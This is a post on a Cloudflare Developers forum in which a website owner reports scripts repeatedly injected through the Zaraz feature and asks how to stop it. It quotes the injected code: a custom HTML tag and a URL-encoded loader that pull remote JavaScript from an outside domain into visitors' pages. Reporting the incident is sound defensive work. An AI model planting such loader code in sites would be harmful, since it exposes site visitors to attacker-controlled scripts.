CD
Cloudflare Developers2w ago
Damien

I wanted to share a potential security

I wanted to share a potential security issue I've encountered with Cloudflare's Zaraz feature. I noticed a suspicious script injection on my website that wasn't originating from my server. After several hours of investigation, I discovered the source: Zaraz. What's concerning is that I had never heard of or enabled Zaraz on my account until now. My Cloudflare account is secure—I have 2FA enabled, and there are no signs of unauthorized access in the activity log or from access notifications. This leads me to believe that Zaraz may have a significant vulnerability that allows third-party script injections. I'm also concerned that Cloudflare might be aware of this issue but hasn't addressed it yet, as my support emails have gone unanswered. Today I discovered they hijacked again and had this custom html set in zaraz named "loftg": <script src="https://www.isoplas.com/js/ff.js"></script> On the website it would look like: 
(function(w,d){{const d = document.createElement('div');d.innerHTML = ``;document.body.appendChild(d);};{const el = document.createElement('script');Object.entries(JSON.parse(decodeURIComponent(`%7B%22src%22%3A%22https%3A%2F%2Fwww.isoplas.com%2Fjs%2Fff.js%22%2C%22onload%22%3A%22%7Bdocument.dispatchEvent(new%20Event(%5C%22loaded-6e55551a-ff8e-4beb-80b6-ece238bba537%5C%22))%7D%22%2C%22order-id%22%3A%226e55551a-ff8e-4beb-80b6-ece238bba537%22%7D`))).forEach(([k, v]) => {el.setAttribute(k, v);});document.head.appendChild(el);}})(window,document)

<script src="https://www.isoplas.com/js/ff.js" onload="{document.dispatchEvent(new Event(&quot;loaded-6e55551a-ff8e-4beb-80b6-ece238bba537&quot;))}" order-id="6e55551a-ff8e-4beb-80b6-ece238bba537"></script>``
(function(w,d){{const d = document.createElement('div');d.innerHTML = ``;document.body.appendChild(d);};{const el = document.createElement('script');Object.entries(JSON.parse(decodeURIComponent(`%7B%22src%22%3A%22https%3A%2F%2Fwww.isoplas.com%2Fjs%2Fff.js%22%2C%22onload%22%3A%22%7Bdocument.dispatchEvent(new%20Event(%5C%22loaded-6e55551a-ff8e-4beb-80b6-ece238bba537%5C%22))%7D%22%2C%22order-id%22%3A%226e55551a-ff8e-4beb-80b6-ece238bba537%22%7D`))).forEach(([k, v]) => {el.setAttribute(k, v);});document.head.appendChild(el);}})(window,document)

<script src="https://www.isoplas.com/js/ff.js" onload="{document.dispatchEvent(new Event(&quot;loaded-6e55551a-ff8e-4beb-80b6-ece238bba537&quot;))}" order-id="6e55551a-ff8e-4beb-80b6-ece238bba537"></script>``
How can I put an end to this? It already happened three times already...
1 Reply
Unknown User
Unknown User2w ago
Message Not Public
Sign In & Join Server To View

Did you find this page helpful?